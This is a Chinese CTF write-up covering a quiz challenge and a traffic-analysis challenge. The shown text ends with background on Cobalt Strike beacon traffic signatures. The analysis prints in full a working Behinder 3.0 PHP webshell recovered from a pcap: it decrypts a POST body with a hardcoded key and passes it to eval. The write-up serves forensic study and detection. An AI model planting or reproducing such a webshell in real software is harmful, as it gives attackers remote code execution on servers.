有些题目没法赛后复现，只能借鉴其他师傅的WP了

附件下载：https://github.com/primaryonetwo/2024zjdxs

签到

网安知识大挑战

这题我们队是在最后做出来的，比较菜，刚开局没做我没做这题，反倒最先做出来是Misc01

打开网址是以vue为框架的页面，只有全部题目做对才给flag

在网页的js源文件中Ctrl+F搜索DASCTF关键字可以搜到关键信息，随便翻翻可以找到题目对应的答案

最后提交就给出flag了

NewGrating

流量分析题

拿到附件，首先看到了文件为蝎子.pcapng很显然给了我们提示，大概率是冰蝎Behinder的流量分析

文件总体不大就4667个分组

我首先过滤了http流就在第一个流stream 0中发现传了个webshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

<?php
@error_reporting(0);
session_start();
    // $key="e45e329feb5d925b"; //........................32...md5.........16........................rebeyond
    $key="e46023a69f8db309"; //DASCTF
	$_SESSION['k']=$key;
	session_write_close();
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

这是很经典的冰蝎3.0加密算法特征，key给我们了就是e46023a69f8db309密码是DASCTF我们也可以验证一下，冰蝎的AES密钥key为连接密码的md5前16位

流量分析题

CobaltStrike流量特征

前言

先来了解下什么是CobaltStrikle下面简称CS，在我的理解就是类似于哥斯拉、中国蚁剑相类似的webshell工具，下面是互联网上的的回答，我直接沾上来

Cobalt Strike是一款内网渗透测试工具，常被业界人称为CS。Cobalt Strike 2.0版本主要是结合Metasploit可以称为图形化MSF工具。而Cobalt Strike 3.0已经不再使用Metasploit框架而作为一个独立的平台使用，它分为客户端与服务端，服务端是一个，客户端可以有多个，可被团队进行分布式协团操作。客户端模式和服务端模式可以在Windows以及Linux上运行这里要注意服务端模式在Windows下运行时有可能会出现一些细小的问题不过影响不大。可以很好的解决metasploit对Windows支持不够好的问题。

Cobalt Strike集成了端口转发、服务扫描，自动化溢出，多模式端口监听，win exe木马生成，win dll木马生成，java木马生成，office宏病毒生成，木马捆绑；钓鱼攻击包括：站点克隆，目标信息获取，java执行，浏览器自动攻击等等

其实有关CS的还有很多知识，这里贴一下别人整理好的wikiCobalt Strike | 狼组安全团队公开知识库，

这里我们需要学习的是CS的传输流量，以便可以在wireshrak中辨认，CS分为server和client版本，所以可以团队作业，就是很多个client都可以连接同一个server，这里我们需要了解的是Cobalt Strike有个Beacon命令，我们可以通过wireshark进行分析

如果你用过CrossC2这类工具你应该知道这类工具在使用时一定需要.cobaltstrike.beacon_keys文件，这是因为cobaltstrike在与Beacon通信时是使用的RSA非对称加密，而.cobaltstrike.beacon_keys文件里存储了一个序列化对象这个对象中包含着一个密钥对里面存储着RSA公私钥

在http-beacon通信中默认使用 GET 方法向 /dpixel 、/__utm.gif 、/pixel.gif 等地址发起请求，同时 Cobalt Strike 的Beacon 会将元数据（例如AES密钥）使用 RSA 公钥加密后发送给 C2 服务器。这些元数据通常被编码为 Base64 字符串并作为 Cookie 发送。